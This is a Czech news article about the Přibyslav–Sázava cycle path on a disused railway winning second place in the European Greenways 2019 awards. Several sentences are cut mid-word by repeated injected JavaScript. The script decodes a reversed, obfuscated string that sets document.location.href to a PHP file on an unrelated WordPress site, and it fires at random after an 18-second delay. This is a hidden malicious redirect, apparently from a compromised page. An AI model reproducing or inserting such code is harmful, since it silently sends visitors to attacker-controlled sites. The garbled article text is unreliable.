Cyklostezka na staré železniční trati získala evropské ocenění
Úterý, 17. září 2019
Sázava / Téměř deset kilometrů dlouhá cyklostezka spojující Přibyslav a Sázavu získala jedno z prestižních ocenění pro nejlepší evropské „zelené“ stezky – Greenways 2019. Druhým místem v kategorii Nejlepší technické řešení se tak zařadila mezi atraktivní cyklostezky v Lotyšsku a Rakousku, další kategorie - Příkladné iniciativy a Cena poroty - pak ovládly projekty ve Španělsku. Cenu převzala v lotyšském zámku Dikli náměstkyně hejtmana Kraje Vysočina Jana Fischerová. „Cyklostezka Přibyslav – Sázava patří k nejoblíbenějším na Vysočině a podle našich statistik ji od dubna do září navštíví téměř patnáct tisíc návštěvníků měsíčně, ať už se jedná o cyklisty, in-line bruslaře nebo pěší. Rada kraje se pro["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to rozhodla v souvislosti s oceněním European Greenways 2019 poskytnout Přibyslavi finanční dar ve výši 50 tisíc korun,“ dodala Jana Fischerová.
The European Greenways Association (EGWA) je organizace sdružující více než 50 subjektů z 16 evropských zemí působících v oblasti rozvoje cykloturistiky. „Pravidelně každé dva roky jsou udíleny i prestižní ceny úspěšným projektům, které naplňují charakteristiku greenways. Jsou ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to bezpečné a atraktivní cykloturistické trasy, které vznikají podél řek, ale využívány jsou i koridory bývalých železničních tratí,“ přiblížil krajský cyklokoordiná["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor Petr Stejskal s tím, že právě ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to je i případ cyklostezky z Přibyslavi do Sázavy, která byla na náspech zrušené železniční trasy dokončena v roce 2011. Je dlouhá 8855 metrů s převýšením 56 metrů. Náklady na její výstavbu dosáhly 1,1 milionu euro a z 85 procent je pokryla evropská dotace.